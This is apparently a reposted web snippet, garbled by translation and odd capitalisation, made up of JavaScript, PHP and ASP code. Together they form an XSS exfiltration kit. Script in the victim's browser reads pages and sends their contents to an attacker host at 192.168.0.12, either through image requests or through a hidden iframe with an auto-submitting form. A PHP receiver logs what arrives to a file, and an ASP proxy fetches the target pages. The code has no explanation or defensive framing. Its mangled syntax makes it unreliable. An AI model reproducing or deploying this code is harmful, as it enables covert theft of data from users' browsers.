Js:
Copy Code code as follows:
Document.body.addBehavior ("#default #download");
var mycars = new Array ();
Mycars[0] = "l.htm";
MYCARS[1] = "y.htm";
for (x in Mycars)
{
if (Document.body.startDownload (Mycars[x],getdata)) {
GetData (source);
}
}
function GetData (source)
{
Txt=escape (source);
getreaded (TXT);
}
function getreaded (usr) {
var newimg = new Image ();
Newimg.src= "http://192.168.0.12/style.php?key=" + "\ n" + "\ n" +usr+ "\ n" + "\ n";
}
Php:
Copy Code code as follows:
<?php
Header (' content-type:text/html;charset=gb2312 ');
function Unescape ($STR) {
$str = Rawurldecode ($STR);
Preg_match_all ("/%u.{4}|& #x. {4};|&#\d+;|.+/u", $str, $r);
$ar = $r [0];
foreach ($ar as $k => $v) {
if (substr ($v, 0,2) = = "%u")
$ar [$k] = Iconv ("UCS-2", "UTF-8", Pack ("H4", substr ($v,-4));
ElseIf (substr ($v, 0,3) = = "& #x")
$ar [$k] = Iconv ("UCS-2", "UTF-8", Pack ("H4", substr ($v, 3,-1));
ElseIf (substr ($v, 0,2) = = "&#") {
$ar [$k] = Iconv ("UCS-2", "UTF-8", Pack ("n", substr ($v, 2,-1));
}
}
return join ("", $ar);
}
$file = "news.html";
$_get[' key ']=unescape ($_get[' key ');
Fputs (fopen ($file, ' A + '), $_get[' key ']);
?>
================================================= the following universal ===============
Copy Code code as follows:
<%
Response.Buffer = True
Dim Surlb,send (2)
Send (0) =escape (pagewebproxy ("http://192.168.0.5/sohu.htm"))
Send (1) =escape (Pagewebproxy ("http://192.168.0.5/c.htm"))
function Pagewebproxy (Xmlpath)
Dim I, Re, URL, Html
URL = Xmlpath
Set re = New RegExp
Re. IgnoreCase = True
Re. Global = True
SURLB = Url
Html = Gethttppage (URL)
url = Left (URL, InStrRev (URL, "/")
i = InStr (surlb, "?")
If i > 0 Then
SURLB = Left (surlb, i-1)
End If
Re. Pattern = "(href|action) = (\ ' | ' |")? (\?)"
Html = Re. Replace (Html, "$1=$2" & surlb & "?")
Re. Pattern = "(src|action|href) = (\ ' | ' |")? ((Http|https|javascript): [a-za-z0-9\./=\?%\ -&_~ ' @[\]\ ': +!] + ([^<> ""]) +) (\ ' | "")? "
Html = Re. Replace (Html, "$1x=$2$3$2")
Re. Pattern = "(Window\.open|url) \ ((\ ' | ' |")? ((HTTP|HTTPS):(\/\/|\\\\) [a-za-z0-9\./=\?%\ -&_~ ' @[\]:+!] + ([^\ ' <> "]) +) (\ ' | ' |")? \)"
Html = Re. Replace (Html, "$1x ($2$3$2)")
Re. Pattern = "(src|action|href|background) = (\ ' | ' |")? ([^\/"" \ "][a-za-z0-9\./=\?%\ -&_~ ' @[\]:+!] + ([^\ ' <> "]) +) (\ ' |" ")?"
Html = Re. Replace (Html, "$1=$2" & Url & "$3$2")
Re. Pattern = "(src|action|href|background) = (\ ' | ' |")? \/([^ "" \ '][a-za-z0-9\./=\?%\ -&_~ ' @[\]:+!] + ([^\ ' <> "]) +) (\ ' |" ")?"
Html = Re. Replace (Html, "$1=$2http://" & Split (URL, "/") (2) & "/$3$2")
Re. Pattern = "(src|action|href) = (\ ' | ' |")? \/(\'|"")?"
Html = Re. Replace (Html, "$1=$2http://" & Split (URL, "/") (2) & "/$2")
Re. Pattern = "(Window\.open|url) \ ((\ ' | ' |")? ([^\/"" \ "http:][a-za-z0-9\./=\?%\ -&_~ ' @[\]+!] + ([^\ ' <> "]) +) (\ ' | ' |")? \)"
Html = Re. Replace (Html, "$" & Url & "$3$2)")
Re. Pattern = "(Window\.open|url) \ ((\ ' | ' |")? \/([^ "" \ ' http:][a-za-z0-9\./=\?%\ -&_~ ' @[\]+!] + ([^\ ' <> "]) +) (\ ' | ' |")? \)"
Html = Re. Replace (Html, "$ ($2http://" & Split (URL, "/") (2) & "/$3$2")
HTML = Replace (HTML, "&", "%26")
If Split (URL, "/") (2) = "club.isso.com.cn" Then
HTML = Replace (HTML, "%26amp;", "%26")
Else
HTML = Replace (HTML, "%26amp;", "&")
End If
HTML = Replace (HTML, "%26NBSP;", "")
HTML = Replace (HTML, "%26LT;", "<")
HTML = Replace (HTML, "%26GT;", ">")
HTML = Replace (HTML, "%26quot;", "" ")
HTML = Replace (HTML, "%26copy;", "©")
HTML = Replace (HTML, "%26reg;", "®")
HTML = Replace (HTML, "%26raquo;", "»")
HTML = Replace (HTML, "%26%26", "&&")
HTML = Replace (HTML, "%26#", "&#")
' HTML = Replace (HTML, '%26 ', ' "')
Re. Pattern = "(src|action|href) x= (\ ' |")? ((Http|https|javascript): [a-za-z0-9\./=\?%\ -&_~ ' @[\]\ ': +!] + ([^<> ""]) +) (\ ' | "")? "
Html = Re. Replace (Html, "$1=$2$3$2")
Re. Pattern = "((HTTP|HTTPS):(\/\/|\\\\) [a-za-z0-9\./=\?%\ -&_~ ' @[\]\ ': +!] + ([^<> ""]) +) "'" (gif|jpg|bmp|png)) "
Html = Re. Replace (Html, "? url=$1")
Re. Pattern = "\?url=" & URL & "(#|javascript:)"
Html = Re. Replace (Html, "$")
Re. Pattern = "Multipart\/form-data"
Html = Re. Replace (Html, "")
Pagewebproxy=html
End Function
Function gethttppage (URL)
Dim Http, Thestr, Fileext
Set Http = Server.CreateObject ("MSXML2.") XMLHTTP ")
If Request.Form.Count > 0 Then
For each x in Request.Form
Thestr = thestr & Server.URLEncode (x) & "=" & Server.URLEncode (Request.Form (x)) & "&"
Next
Http.open "POST", url, False
Http.setrequestheader "Content-type", "application/x-www-form-urlencoded"
Http.send (THESTR)
Else
Http.open "Get", url, False
Http.send ()
End If
If Http.readystate<>4 then Exit Function
Fileext = LCase (Mid (URL, InStrRev (URL, ".") + 1)
If InStr ("$jpg $gif$bmp$png$js$", "$" & Fileext & "$") > 0 Then
Response.Clear
Response.BinaryWrite Http.responsebody
Response.End ()
Else
If InStr ("$rar $mdb$zip$exe$com$ico$", "$" & Fileext & "$") > 0 Then
Response.AddHeader "Content-disposition", "attachment"; Filename= "& Mid" (SURLB, InStrRev (SURLB, "/") + 1)
Response.BinaryWrite Http.responsebody
Response.Flush
Else
Gethttppage = Bytestobstr (Http.responsebody, "GB2312")
End If
End If
Set Http = Nothing
End Function
Function Bytestobstr (Body,cset)
Dim objstream
Set objstream = Server.CreateObject ("ADODB.stream")
Objstream. Type = 1
Objstream. Mode =3
Objstream. Open
Objstream. Write body
Objstream. Position = 0
Objstream. Type = 2
Objstream. Charset = Cset
Bytestobstr = objstream. ReadText
Objstream. Close
Set objstream = Nothing
End Function
%>
Document.writeln ("<iframe name=\" mimi\ "Src=about:blank style=display:none><\/iframe>")
Document.writeln ("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=post target=mimi>");
Document.writeln ("<input id=var name=var type=hidden>");
Document.writeln ("<input id=vartwo name=vartwo type=hidden>");
Document.writeln ("<input type=submit style=display:none>");
Document.writeln ("<\/form>")
document.getElementById ("var"). Value = ' http://192.168.0.5/sohu.htm ' +unescape (' <%=send (0)%> ');
document.getElementById ("Vartwo"). Value = ' http://192.168.0.5/c.htm ' +unescape (' <%=send (1)%> ');
document.getElementById ("form"). Submit ();